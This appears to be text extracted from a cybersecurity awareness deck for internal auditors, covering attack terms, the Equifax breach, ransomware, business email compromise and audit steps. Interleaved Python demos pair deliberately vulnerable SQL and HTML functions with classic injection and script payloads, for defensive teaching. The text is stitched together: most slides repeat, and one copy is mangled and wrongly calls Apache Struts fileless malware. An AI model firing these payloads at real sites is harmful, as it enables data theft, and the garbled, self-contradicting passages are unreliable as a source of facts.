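PATCH_AGE_LIMIT_DAYS = 365


@dataclass
class Device:
    host: str
    kind: str                        # workstation, server, network, hypervisor...
    patch_released: Optional[date]   # newest applicable vendor release
    patch_installed: Optional[date]  # when that release was applied, if ever
    risk_acceptance: Optional[str] = None  # tracking id if management accepted the gap


def patch_gap_days(device, as_of):
    """Days a released patch has been outstanding (0 when applied or none pending)."""
    if device.patch_released is None or device.patch_installed is not None:
        return 0
    return (as_of - device.patch_released).days


def classify(devices, as_of):
    """Split the inventory into exceptions, accepted risks and devices within tolerance."""
    result = {"exception": [], "accepted_risk": [], "within_tolerance": []}
    for d in devices:
        gap = patch_gap_days(d, as_of)
        if gap <= PATCH_AGE_LIMIT_DAYS:
            result["within_tolerance"].append(d.host)
        elif d.risk_acceptance:
            result["accepted_risk"].append(d.host)
        else:
            result["exception"].append(d.host)
    return result


def unknown_hosts(inventory, scanned_hosts):
    """Hosts on the network that the inventory does not know about."""
    return sorted(set(scanned_hosts) - {d.host for d in inventory})


# Constructed inventory and scan result (not real systems).
INVENTORY = [
    Device("ws-101", "workstation", date(2018, 8, 14), date(2018, 8, 20)),
    Device("srv-fin1", "server", date(2017, 3, 14), None),                # over a year, no acceptance
    Device("esx-02", "hypervisor", date(2017, 6, 6), None, "RA-2017-09"),  # over a year, accepted
    Device("sw-core", "network", date(2018, 5, 2), None),                 # pending, under a year
]
SCAN_RESULTS = ["ws-101", "srv-fin1", "esx-02", "sw-core", "printer-7"]


def run_patch_audit(as_of=date(2018, 10, 1)):
    """Produce the four buckets an auditor would carry into the workpaper."""
    report = classify(INVENTORY, as_of)
    report["not_in_inventory"] = unknown_hosts(INVENTORY, SCAN_RESULTS)
    return report


if __name__ == "__main__":
    for bucket, hosts in run_patch_audit().items():
        print(f"{bucket:17} {hosts}")
```

The accepted-risk bucket is not a pass: the slide asks the auditor to go on and assess whether the mitigating controls behind each acceptance are sufficient, so those hosts get their own follow-up rather than disappearing into the compliant count.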
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval).
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal
mobile: (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates
stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each of which is running one or more bots after being infected with malware. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam, and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service (DDoS) – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A Distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected as part of a botnet.
ATTACKS IN THE HEADLINES
https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html
https://www.wired.com/story/reaper-iot-botnet-infected-million-networks/
COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site Scripting Attacks – An attack occurrence where the attacker injects malicious code into a website. In SQL Injection, the attacker uses SQL language to obtain information back from the website that was unintended. In Cross-site Scripting, the attacker injects code that only impacts other users of the website.
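The SQL Injection definition above made concrete, from the defender's side: the same customer lookup written once with string concatenation (the defect) and once with a bound parameter (the fix), run against an in-memory SQLite table so the difference in what the database returns is visible. This is an added example and not code from the presentation; the table, the rows and the sample inputs are constructed.

```python
"""Added example: SQL injection, vulnerable lookup beside the hardened one.

lookup_unsafe() pastes the caller's input into the SQL text, so the database
parses the input as part of the query. lookup_safe() sends the same query with
a placeholder and passes the input as a bound parameter, so the database only
ever treats it as a value to compare. The table and rows are constructed.
"""
import sqlite3


def build_db():
    """Constructed customer table with three sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER, name TEXT, card_last4 TEXT)")
    conn.executemany(
        "INSERT INTO customers VALUES (?, ?, ?)",
        [(1, "alice", "4242"), (2, "bob", "1881"), (3, "carol", "0005")],
    )
    return conn


def lookup_unsafe(conn, name):
    """Vulnerable: user input is concatenated into the SQL text."""
    sql = "SELECT name, card_last4 FROM customers WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Hardened: identical query, but the value is bound as a parameter."""
    sql = "SELECT name, card_last4 FROM customers WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def demo():
    """Run both lookups with a normal name and with a constructed tampered input."""
    conn = build_db()
    normal = "bob"
    # Constructed input: closes the quoted string and appends an always-true
    # condition, which is exactly what the unsafe version cannot distinguish
    # from legitimate SQL.
    tampered = "x' OR '1'='1"
    return {
        "unsafe_normal": lookup_unsafe(conn, normal),
        "unsafe_tampered": lookup_unsafe(conn, tampered),
        "safe_normal": lookup_safe(conn, normal),
        "safe_tampered": lookup_safe(conn, tampered),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case:16} -> {rows}")
```

For an auditor the question to ask the development team is whether every query that carries user-supplied data uses the parameterized form; a code review or static-analysis rule that flags string concatenation into SQL is the corresponding detective control.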
ATTACKS IN THE HEADLINES
https://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable/
https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/comment-page-1/
https://www.scmagazine.com/home/security-news/cisco-patches-prime-license-manager-sql-injection-vulnerability/
https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions/
COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – A catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability / Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero-day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is a version of malware that has been in the headlines
• Malware can grant command and control of a device to the hackers
• 1 in 131 emails contained malware in 2016
• "Fileless" malware is a new variant that is more difficult to detect
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• The attack started in early March 2017 with hackers using a bot programmed to search the web for a recently released CVE (Common Vulnerability and Exposure)
• It took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims
• Hackers then used another vulnerability (a fileless malware named Apache Struts) that was also a CVE that had been issued a month before but never fixed
• Hackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Over 148 million records were stolen
• The attack was not identified until July 30, 2017
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or credit card data, as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key.
• The use of BITCOINS is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have now dropped but are still present (HR and healthcare companies both in February)
• The WannaCry ransomware attack impacted over 200,000 people across 150 countries (included a worm)
RANSOMWARE
Ransomware-as-a-Service allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS will handle the ransom payments. The RaaS developer takes a cut of any payments that are made. The developer will also reduce their cut depending on the volume of payments received.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center, or IC3, said that based on fraud reports submitted from October 2013 to May 2018 there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
• All nine lost at least $1 million due to the BEC scam
• Two companies lost more than $30 million each
• In total the nine issuers lost almost $100 million
BEC & PHISHING
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear Phishing: Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing data (IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING EMAIL EXAMPLE
Most companies battle the increased phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
This "band-aid" is still widely in practice today, however
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device’s risk relating to patches
• Understand your company’s fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password parameters are adequate (password length, character requirements and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and that backups are properly segregated from the production network, so that an intruder or ransomware cannot reach them
• Understand the coverage and terms of your company’s cyber insurance policy
• Assess the requirement for multi-factor authentication
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal. Mobile: (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett & Associates (stinnett-associates.com)
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
ATTACKS IN THE HEADLINES
https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html
https://www.wired.com/story/reaper-iot-botnet-infected-million-networks/
COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs, either within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attack – An attack in which the attacker has placed themselves in the middle of the communications between two parties. The attacker can read or alter the data passing between them without either party being aware.
SQL Injection and Cross-Site Scripting (XSS) Attacks – Attacks in which the attacker injects malicious input into a website. In SQL injection, the attacker supplies input that the site’s database interprets as part of the SQL query, returning data (or allowing changes) the application never intended. In cross-site scripting, the attacker injects script that runs in the browsers of other users of the website, so the damage lands on those users rather than on the server.
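An added illustration (not part of the presentation) of the two injection attacks just defined, in Python with an in-memory SQLite table of constructed sample users. The same malicious input defeats the query built by string concatenation and is harmless to the parameterized one, and the same script payload is neutralised by HTML escaping before it is written into the page.

```python
import html
import sqlite3

def build_db() -> sqlite3.Connection:
    """Constructed in-memory users table (sample data, not real accounts)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct horse", "admin"),
        ("bob", "hunter2", "user"),
    ])
    return con

def login_vulnerable(con, username: str, password: str):
    # BAD: user input is pasted into the SQL text, so the input can rewrite the query.
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return con.execute(sql).fetchall()

def login_safe(con, username: str, password: str):
    # GOOD: placeholders keep the input as data; the query structure cannot change.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchall()

def greeting_vulnerable(name: str) -> str:
    # BAD: untrusted input written straight into HTML; a <script> payload runs in
    # the browser of every user who views the page.
    return f"<p>Welcome, {name}!</p>"

def greeting_safe(name: str) -> str:
    # GOOD: escape so the browser treats the input as text, not markup.
    return f"<p>Welcome, {html.escape(name)}!</p>"

def demo() -> dict:
    con = build_db()
    injected = "' OR '1'='1"          # classic SQL injection payload
    payload = "<script>alert(1)</script>"   # classic XSS payload
    return {
        "sqli_vulnerable": login_vulnerable(con, "anyone", injected),
        "sqli_safe": login_safe(con, "anyone", injected),
        "xss_vulnerable": greeting_vulnerable(payload),
        "xss_safe": greeting_safe(payload),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:16} {result}")
```

With the injected password the vulnerable query becomes `... AND password = '' OR '1'='1'`, which is true for every row, so it returns both users (including the admin) without any valid credentials; the parameterized version returns nothing. The escaped greeting contains `&lt;script&gt;`, which the browser displays as text.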
ATTACKS IN THE HEADLINES
https://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable/
https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/comment-page-1/
https://www.scmagazine.com/home/security-news/cisco-patches-prime-license-manager-sql-injection-vulnerability/
https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions/
COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – A catalog of publicly known cybersecurity vulnerabilities, sponsored by the U.S. Department of Homeland Security and maintained by MITRE, in which each entry gets a CVE identifier. Vulnerabilities are known errors in a system or software that give an attacker direct access. Exposures are known errors that give an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware outbreaks and cyber attacks in the news resulted from attackers using a vulnerability that had been known, and fixed by the vendor, for months or years but had never been patched by the company.
Zero-Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero-day vulnerabilities are the most difficult to protect against and detect because no vendor fix or guidance exists yet.
Advanced Persistent Threat (APT) – A set of stealthy and continuous computer intrusion processes, often orchestrated by a person or group targeting a specific entity.
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and ransomware. Malware is designed to interfere with normal computer operation, usually giving attackers a way to gain access to your computer and collect sensitive personal information.
• Malware is commonly the first access point used in connection with hacking attempts
• Ransomware is a type of malware that has been in the headlines
• Malware can grant command and control of a device to the attackers
• 1 in 131 emails contained malware in 2016
• “Fileless” malware, which runs in memory or abuses legitimate system tools rather than writing an executable to disk, is a newer variant that is more difficult to detect
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• The attack started in early March 2017, with the attackers using a bot programmed to search the web for systems affected by a recently released CVE (Common Vulnerabilities and Exposures entry)
• It took the attackers two months before they found the vulnerability on one of Equifax’s websites, used to help customers with disputes and claims
• The attackers then exploited a vulnerability in the Apache Struts web application framework that the site ran on (Struts is a software framework, not malware). That vulnerability had its own CVE and a vendor fix had been published before the intrusion, but the fix was never applied by Equifax
• The attackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Personal data of roughly 148 million consumers was stolen
• The attack was not identified until July 30, 2017
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority (the Information Commissioner’s Office) reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving licence numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites on the internet that are not reachable through normal search engines or browsers. Darknet sites require special software, such as Tor (The Onion Router), that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black-market purchasing of stolen PII or credit card data, as well as botnet rentals. Bitcoin is the usual medium of exchange on the dark web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger (the blockchain) that, along with all Bitcoin transactions, is verified by a massive amount of computing power. Bitcoin mining is the process through which new bitcoins come into circulation: miners compete to solve a computationally difficult puzzle to discover a new block, which is added to the blockchain, and the successful miner receives a reward of a few bitcoins. As more computing power joins the network, the difficulty of the puzzle is adjusted upward so that blocks continue to be found at roughly the same rate.
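A toy version of the mining puzzle, added here to make the definition concrete (this is example code, not anything from the presentation or from Bitcoin itself). It simplifies the real protocol: Bitcoin hashes an 80-byte block header twice with SHA-256 and searches a 32-bit nonce, whereas here a single SHA-256 over a constructed header plus an 8-byte nonce must fall below a target. The target halves for each extra bit of difficulty, so finding a solution takes exponentially more hashing while checking one takes a single hash.

```python
import hashlib
from typing import Optional, Tuple

def _hash(header: bytes, nonce: int) -> bytes:
    # Simplification: one SHA-256 over header||nonce (Bitcoin uses double SHA-256).
    return hashlib.sha256(header + nonce.to_bytes(8, "big")).digest()

def mine(header: bytes, difficulty_bits: int, max_nonce: int = 10_000_000) -> Optional[Tuple[int, str]]:
    """Find a nonce whose hash has at least `difficulty_bits` leading zero bits.
    Every extra bit halves the target, so the expected work doubles."""
    target = 1 << (256 - difficulty_bits)
    for nonce in range(max_nonce):
        h = _hash(header, nonce)
        if int.from_bytes(h, "big") < target:
            return nonce, h.hex()
    return None  # give up; a real miner keeps going with a changed header

def verify(header: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Anyone can check a claimed block with a single hash, however long it took to find."""
    return int.from_bytes(_hash(header, nonce), "big") < (1 << (256 - difficulty_bits))

if __name__ == "__main__":
    header = b"constructed block header"   # sample bytes, not real chain data
    for bits in (8, 12, 16):
        nonce, digest = mine(header, bits)
        print(f"{bits:2d} bits: nonce {nonce:7d} -> {digest[:16]}  valid={verify(header, nonce, bits)}")
```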
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system’s screen or by locking the user’s files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to obtain a decryption key.
• Bitcoin is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017; the rate has since dropped, but attacks are still present (HR and healthcare companies were both hit in February)
• The WannaCry ransomware attack infected over 200,000 computers across 150 countries (it included a worm component, so it spread between machines without any user action)
RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS operator handles the ransom payments. The RaaS developer takes a cut of any payments that are made, and reduces that cut as the volume of payments received grows.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company’s corporate email accounts, impersonating or “spoofing” the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees
• The FBI’s Internet Crime Complaint Center (IC3) said that, based on fraud reports submitted from October 2013 to May 2018, there were 41,058 US victims of BEC schemes, who collectively lost at least $2.9 billion, while global exposed losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a “highly unusual action” by the SEC and identified nine public companies that had been specifically investigated by the SEC due to a BEC incident
  • All nine lost at least $1 million to the BEC scam
  • Two companies lost more than $30 million each
  • In total, the nine issuers lost almost $100 million
BEC & PHISHING
Phishing – A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment or clicking the link.
Spear Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include cloning (reusing a previous legitimate email) and whaling (attacking a high-level executive).
• CEO email to treasurer
• HR phishing for employee data
• W-2 phishing (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING EMAIL EXAMPLE
